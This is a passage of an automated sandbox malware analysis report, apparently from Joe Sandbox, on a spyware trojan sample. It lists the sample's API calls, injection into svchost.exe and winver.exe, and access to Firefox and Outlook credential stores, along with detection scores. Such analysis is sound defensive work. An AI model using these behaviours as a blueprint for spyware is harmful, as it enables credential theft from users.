Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CA0 NtQueryInformationToken,	2_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CF0 NtOpenProcess,	2_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CC0 NtQueryVirtualMemory,	2_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C00 NtQueryInformationProcess,	2_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C60 NtCreateKey,	2_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C70 NtFreeVirtualMemory,	2_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73090 NtSetValueKey,	2_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73010 NtOpenDirectoryObject,	2_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A739B0 NtGetContextThread,	2_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D10 NtOpenProcessToken,	2_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D70 NtOpenThread,	2_2_03A73D70

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003CA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_003CA1EF

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003B85B1 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,

0_2_003B85B1

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_003C51BD

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0036E6A0	0_2_0036E6A0
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0038D975	0_2_0038D975
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0036FCE0	0_2_0036FCE0
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003821C5	0_2_003821C5
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003962D2	0_2_003962D2
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003E03DA	0_2_003E03DA
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0039242E	0_2_0039242E
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003825FA	0_2_003825FA
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003BE616	0_2_003BE616
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003766E1	0_2_003766E1
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0039878F	0_2_0039878F
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00378808	0_2_00378808
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003E0857	0_2_003E0857
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00396844	0_2_00396844
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C8889	0_2_003C8889
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0038CB21	0_2_0038CB21
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00396DB6	0_2_00396DB6
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00376F9E	0_2_00376F9E
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00373030	0_2_00373030
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00383187	0_2_00383187
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0038F1D9	0_2_0038F1D9
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00361287	0_2_00361287
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00381484	0_2_00381484
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00375520	0_2_00375520
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00387696	0_2_00387696
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00375760	0_2_00375760
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00381978	0_2_00381978
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00399AB5	0_2_00399AB5
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0038BDA6	0_2_0038BDA6
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00381D90	0_2_00381D90
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003E7DDB	0_2_003E7DDB
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0036DF00	0_2_0036DF00
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00373FE0	0_2_00373FE0
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00E79AE8	0_2_00E79AE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004188E3	2_2_004188E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004100EA	2_2_004100EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004100F3	2_2_004100F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403150	2_2_00403150
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011F0	2_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416AEE	2_2_00416AEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416AF3	2_2_00416AF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E2F3	2_2_0040E2F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410313	2_2_00410313
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E443	2_2_0040E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401C60	2_2_00401C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402C7B	2_2_00402C7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E438	2_2_0040E438
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402C80	2_2_00402C80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E48C	2_2_0040E48C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404754	2_2_00404754
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EFD3	2_2_0042EFD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B003E6	2_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC02C0	2_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B001AA	2_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF81CC	2_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30100	2_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64750	2_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C6E0	2_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B00591	2_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEE4F6	2_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF2446	2_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF6BD7	2_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0A9A6	2_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A268B8	2_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E8F0	2_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4A840	2_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABEFA0	2_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A82F28	2_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60F30	2_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52E90	2_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFCE93	2_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEEDB	2_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEE26	2_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40E59	2_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A58DBF	2_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3ADE0	2_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4AD00	2_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0CB5	2_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30CF2	2_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40C00	2_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A8739A	2_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF132D	2_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2D34C	2_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A452A0	2_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE12ED	2_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B2C0	2_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4B1B0	2_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7516C	2_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2F172	2_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0B16B	2_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF70E9	2_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF0E0	2_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEF0CC	2_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A470C0	2_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF7B0	2_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A317EC	2_2_03A317EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF16CC	2_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADD5B0	2_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7571	2_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF43F	2_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A31460	2_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FB80	2_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB5BF0	2_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7DBF9	2_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFB76	2_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADDAAC	2_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A85AA0	2_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEDAC6	2_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB3A6C	2_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFA49	2_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7A46	2_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD5910	2_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49950	2_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B950	2_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A438E0	2_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAD800	2_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFFB1	2_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A41F92	2_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFF09	2_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49EB0	2_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FDC0	2_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7D73	2_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A43D40	2_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF1D5A	2_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB9C32	2_2_03AB9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 278 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 98 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 57 times
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: String function: 00388900 appears 42 times
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: String function: 00367DE1 appears 36 times
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: String function: 00380AE3 appears 70 times

Source: aBEh0fsi2c.exe, 00000000.00000003.1334448045.0000000003783000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs aBEh0fsi2c.exe
Source: aBEh0fsi2c.exe, 00000000.00000003.1336401283.000000000397D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs aBEh0fsi2c.exe

Source: aBEh0fsi2c.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@7/5

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003CA06A GetLastError,FormatMessageW,

0_2_003CA06A

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003B81CB AdjustTokenPrivileges,CloseHandle,		0_2_003B81CB
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_003B87E1

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003CB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_003CB333

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003DEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_003DEE0D

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003D83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_003D83BB

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00364E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00364E89

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

File created: C:\Users\user\AppData\Local\Temp\aut482C.tmp

Jump to behavior

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Command line argument: 8]

0_2_003647D0

Source: aBEh0fsi2c.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: winver.exe, 00000005.00000002.2550854320.0000000003086000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2550854320.0000000003090000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1909375412.0000000003086000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2550854320.00000000030B4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1909195783.0000000003065000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: aBEh0fsi2c.exe	Virustotal: Detection: 31%
Source: aBEh0fsi2c.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\aBEh0fsi2c.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: aBEh0fsi2c.exe

Static file information: File size 1183744 > 1048576

Source: aBEh0fsi2c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: aBEh0fsi2c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: aBEh0fsi2c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: aBEh0fsi2c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: aBEh0fsi2c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: aBEh0fsi2c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: aBEh0fsi2c.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: winver.pdb source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XWDsAjkFcK.exe, 00000004.00000002.2548851563.00000000008DE000.00000002.00000001.01000000.00000006.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1743900413.00000000008DE000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: wntdll.pdbUGP source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
